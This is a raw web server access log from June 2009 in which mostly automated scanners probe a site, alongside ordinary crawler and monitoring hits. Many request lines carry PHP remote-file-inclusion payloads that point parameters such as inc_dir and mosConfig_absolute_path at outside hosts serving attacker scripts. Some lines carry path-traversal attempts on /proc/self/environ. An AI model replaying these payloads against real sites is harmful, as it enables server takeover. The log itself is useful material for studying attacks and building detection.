211.189.18.73 - - [12/Jun/2009:02:07:51 -0400] "GET /logs/access_log.Q109052200%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
194.54.88.38 - - [12/Jun/2009:02:07:54 -0400] "GET /logs/access_log.Q108052700/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
194.54.88.38 - - [12/Jun/2009:02:07:54 -0400] "GET /errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
194.54.88.38 - - [12/Jun/2009:02:07:54 -0400] "GET /logs/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
211.189.18.73 - - [12/Jun/2009:02:07:54 -0400] "GET /logs/access_log.Q109050300%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
194.54.88.38 - - [12/Jun/2009:02:07:56 -0400] "GET /logs/access_log.Q108052700/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
194.54.88.38 - - [12/Jun/2009:02:07:56 -0400] "GET /errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
194.54.88.38 - - [12/Jun/2009:02:07:56 -0400] "GET /logs/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
70.85.165.10 - - [12/Jun/2009:02:08:03 -0400] "GET /logs/error_log.Q109050800%20/e404.php?DOCUMENT_ROOT=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.811"
195.34.78.110 - - [12/Jun/2009:02:08:08 -0400] "GET /index.php?inc_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
195.34.78.110 - - [12/Jun/2009:02:08:08 -0400] "GET /logs/index.php?inc_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
195.34.78.110 - - [12/Jun/2009:02:08:08 -0400] "GET /logs/access_log.Q109052900/index.php?inc_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.34.78.110 - - [12/Jun/2009:02:08:12 -0400] "GET /logs/access_log.Q109052400/index.php?inc_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:02:08:42 -0400] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:02:08:43 -0400] "GET /logs/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:02:08:43 -0400] "GET /logs/access_log.Q109050700%20%20/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
121.199.14.40 - - [12/Jun/2009:02:09:20 -0400] "GET /logs/access_log.Q109052500//blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 249 "-" "Mozilla/5.0"
121.199.14.40 - - [12/Jun/2009:02:09:20 -0400] "GET //blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 222 "-" "Mozilla/5.0"
121.199.14.40 - - [12/Jun/2009:02:09:21 -0400] "GET /logs//blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 227 "-" "Mozilla/5.0"
194.54.88.38 - - [12/Jun/2009:02:09:33 -0400] "GET /logs/access_log.Q109052500/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
194.54.88.38 - - [12/Jun/2009:02:09:33 -0400] "GET /logs/access_log.Q109052500/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
211.189.18.73 - - [12/Jun/2009:02:09:43 -0400] "GET /logs/access_log.Q109052200%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.6.22.170 - - [12/Jun/2009:02:09:45 -0400] "GET /logs/access_log.Q108101100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
195.34.78.110 - - [12/Jun/2009:02:10:00 -0400] "GET /index.php?inc_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
195.34.78.110 - - [12/Jun/2009:02:10:00 -0400] "GET /logs/index.php?inc_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
195.34.78.110 - - [12/Jun/2009:02:10:00 -0400] "GET /logs/access_log.Q109052200/index.php?inc_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.6.22.170 - - [12/Jun/2009:02:10:08 -0400] "GET /logs/access_log.Q109052500 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.111.0.66 - - [12/Jun/2009:02:10:10 -0400] "GET /logs/access_log.Q109052600%20%20/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
91.121.23.156 - - [12/Jun/2009:02:10:19 -0400] "GET /logs/access_log.Q109052400/ashnews.php?pathtoashnews=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.813"
91.121.23.156 - - [12/Jun/2009:02:10:19 -0400] "GET /ashnews.php?pathtoashnews=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.813"
91.121.23.156 - - [12/Jun/2009:02:10:20 -0400] "GET /logs/ashnews.php?pathtoashnews=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.813"
218.249.36.194 - - [12/Jun/2009:02:10:21 -0400] "GET /index.php?inc_dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:02:10:21 -0400] "GET /logs/access_log.Q109052200/index.php?inc_dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:02:10:21 -0400] "GET /logs/index.php?inc_dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:02:10:26 -0400] "GET /logs/access_log.Q109052200/index.php?inc_dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:02:10:26 -0400] "GET /index.php?inc_dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:02:10:26 -0400] "GET /logs/index.php?inc_dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
91.121.23.156 - - [12/Jun/2009:02:10:26 -0400] "GET /logs/access_log.Q109050700/ashnews.php?pathtoashnews=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.813"
38.99.13.118 - - [12/Jun/2009:02:10:56 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
121.199.14.40 - - [12/Jun/2009:02:11:09 -0400] "GET /logs/error_log.Q109052500//blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 247 "-" "Mozilla/5.0"
38.99.44.103 - - [12/Jun/2009:02:11:09 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
66.249.71.54 - - [12/Jun/2009:02:11:10 -0400] "GET /images/logo_10.gif HTTP/1.1" 200 625 "-" "Googlebot-Image/1.0"
195.34.78.110 - - [12/Jun/2009:02:11:13 -0400] "GET /logs/access_log.Q109052400/index.php?inc_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:02:11:13 -0400] "GET /logs/access_log.Q109050700/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jun/2009:02:11:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.111.0.66 - - [12/Jun/2009:02:11:48 -0400] "GET /logs/access_log.Q109052600/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
66.128.53.115 - - [12/Jun/2009:02:12:49 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:12:50 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:12:50 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:12:50 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:12:50 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:12:50 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:12:50 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:12:50 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:12:50 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:12:56 -0400] "GET /logs/access_log.Q109050700/!rfihttp://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:12:56 -0400] "GET /!rfihttp://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:12:56 -0400] "GET /logs/!rfihttp://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:12:56 -0400] "GET /logs/access_log.Q109050700/!rfihttp://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:12:56 -0400] "GET /!rfihttp://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:12:56 -0400] "GET /logs/!rfihttp://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:13:04 -0400] "GET /logs/access_log.Q109050700/!rfihttp://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:13:04 -0400] "GET /!rfihttp://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:13:04 -0400] "GET /logs/!rfihttp://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
85.75.83.86 - - [12/Jun/2009:02:13:23 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; el; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
85.75.83.86 - - [12/Jun/2009:02:13:23 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; el; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
85.75.83.86 - - [12/Jun/2009:02:13:24 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; el; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
85.75.83.86 - - [12/Jun/2009:02:13:24 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; el; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
218.249.36.194 - - [12/Jun/2009:02:13:41 -0400] "GET /logs/access_log.Q109052200%20%20/index.php?inc_dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.128.53.115 - - [12/Jun/2009:02:13:45 -0400] "GET /logs/access_log.Q109050300/!rfihttp://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:13:45 -0400] "GET /logs/access_log.Q109050300/!rfihttp://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:13:45 -0400] "GET /logs/access_log.Q109050300/!rfihttp://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.814"
218.249.36.194 - - [12/Jun/2009:02:13:58 -0400] "GET /logs/index.php?inc_dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:02:13:58 -0400] "GET /logs/access_log.Q109031800%20%20/index.php?inc_dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:02:13:58 -0400] "GET /index.php?inc_dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:02:14:07 -0400] "GET /logs/access_log.Q109052900%20%20/index.php?inc_dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:02:14:13 -0400] "GET /logs/access_log.Q109052200%20%20/index.php?inc_dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:02:14:21 -0400] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:02:14:21 -0400] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
87.229.45.106 - - [12/Jun/2009:02:14:37 -0400] "GET /logs//main.php?sayfa=http://www.mepradio.it/administrator/components/com_chronocontact/excelwriter/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
87.229.45.106 - - [12/Jun/2009:02:14:37 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://www.mepradio.it/administrator/components/com_chronocontact/excelwriter/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
87.229.45.106 - - [12/Jun/2009:02:14:37 -0400] "GET //main.php?sayfa=http://www.mepradio.it/administrator/components/com_chronocontact/excelwriter/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
87.229.45.106 - - [12/Jun/2009:02:14:37 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://www.mepradio.it/administrator/components/com_chronocontact/excelwriter/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:02:14:43 -0400] "GET /logs/access_log.Q109052400%20%20/index.php?inc_dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:14:59 -0400] "GET /images/tools/LCALEN.HTM HTTP/1.1" 200 7943 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:15:00 -0400] "GET /images/_notes/download_cat_bone.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.229.45.106 - - [12/Jun/2009:02:15:02 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://www.mepradio.it/administrator/components/com_chronocontact/excelwriter/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.229.45.106 - - [12/Jun/2009:02:15:03 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://www.mepradio.it/administrator/components/com_chronocontact/excelwriter/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:02:15:04 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:15:07 -0400] "GET /images/Office%20Supply/Thumbs.db HTTP/1.1" 200 60416 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.249.36.194 - - [12/Jun/2009:02:15:09 -0400] "GET /logs/index.php?inc_dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:02:15:09 -0400] "GET /index.php?inc_dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:02:15:09 -0400] "GET /logs/access_log.Q109031800%20%20/index.php?inc_dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:02:15:10 -0400] "GET /logs/access_log.Q109052400%20%20/index.php?inc_dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:15:16 -0400] "GET /images/Office%20Supply/LCALEN.HTM HTTP/1.1" 200 7957 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.249.36.194 - - [12/Jun/2009:02:15:20 -0400] "GET /logs/access_log.Q109052900%20%20/index.php?inc_dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:15:27 -0400] "GET /images/Office%20Supply/cell_background.psd HTTP/1.1" 200 34766 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:15:36 -0400] "GET /images/_notes/iso9001.gif.mno HTTP/1.1" 200 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.249.36.194 - - [12/Jun/2009:02:15:43 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:02:15:43 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:15:45 -0400] "GET /images/_notes/ACE_logo.jpg.mno HTTP/1.1" 200 176 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.249.36.194 - - [12/Jun/2009:02:15:47 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:15:56 -0400] "GET /images/_notes/RCM_left.jpg.mno HTTP/1.1" 200 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.249.36.194 - - [12/Jun/2009:02:16:02 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:02:16:05 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:02:16:05 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:02:16:05 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:16:05 -0400] "GET /images/_notes/ace_bkgrd.jpg.mno HTTP/1.1" 200 252 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:16:15 -0400] "GET /images/_notes/RCM_right.jpg.mno HTTP/1.1" 200 179 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:16:24 -0400] "GET /images/_notes/store_anim.gif.mno HTTP/1.1" 200 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [12/Jun/2009:02:16:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.54 - - [12/Jun/2009:02:16:34 -0400] "GET /images/_notes/contact_fax.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:16:44 -0400] "GET /images/_notes/contact_mail.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [12/Jun/2009:02:16:53 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0048644B1C22D100326E04S+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.125.38.117 - - [12/Jun/2009:02:16:56 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
217.125.38.117 - - [12/Jun/2009:02:16:56 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
217.125.38.117 - - [12/Jun/2009:02:16:57 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:17:04 -0400] "GET /images/_notes/connect_anim.gif.mno HTTP/1.1" 200 251 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:17:05 -0400] "GET /images/_notes/ace_logo_top.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:17:13 -0400] "GET /images/_notes/headline_buy5.jpg.mno HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:17:22 -0400] "GET /images/_notes/contact_phone.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.121.23.156 - - [12/Jun/2009:02:17:28 -0400] "GET /logs/access_log.Q109052400/ashnews.php?pathtoashnews=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.813"
91.121.23.156 - - [12/Jun/2009:02:17:28 -0400] "GET /ashnews.php?pathtoashnews=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.813"
91.121.23.156 - - [12/Jun/2009:02:17:28 -0400] "GET /logs/ashnews.php?pathtoashnews=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.813"
66.249.71.54 - - [12/Jun/2009:02:17:32 -0400] "GET /images/_notes/contact_email.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.121.23.156 - - [12/Jun/2009:02:17:32 -0400] "GET /logs/access_log.Q109050700/ashnews.php?pathtoashnews=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.813"
66.249.71.54 - - [12/Jun/2009:02:17:42 -0400] "GET /images/_notes/home_welcome2.jpg.mno HTTP/1.1" 200 251 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:17:51 -0400] "GET /images/_notes/connect_anim2.gif.mno HTTP/1.1" 200 195 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.249.36.194 - - [12/Jun/2009:02:17:55 -0400] "GET /logs/access_log.Q109051600%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:02:18:00 -0400] "GET /logs/access_log.Q109051600%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:18:01 -0400] "GET /images/_notes/circle_CD_off.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
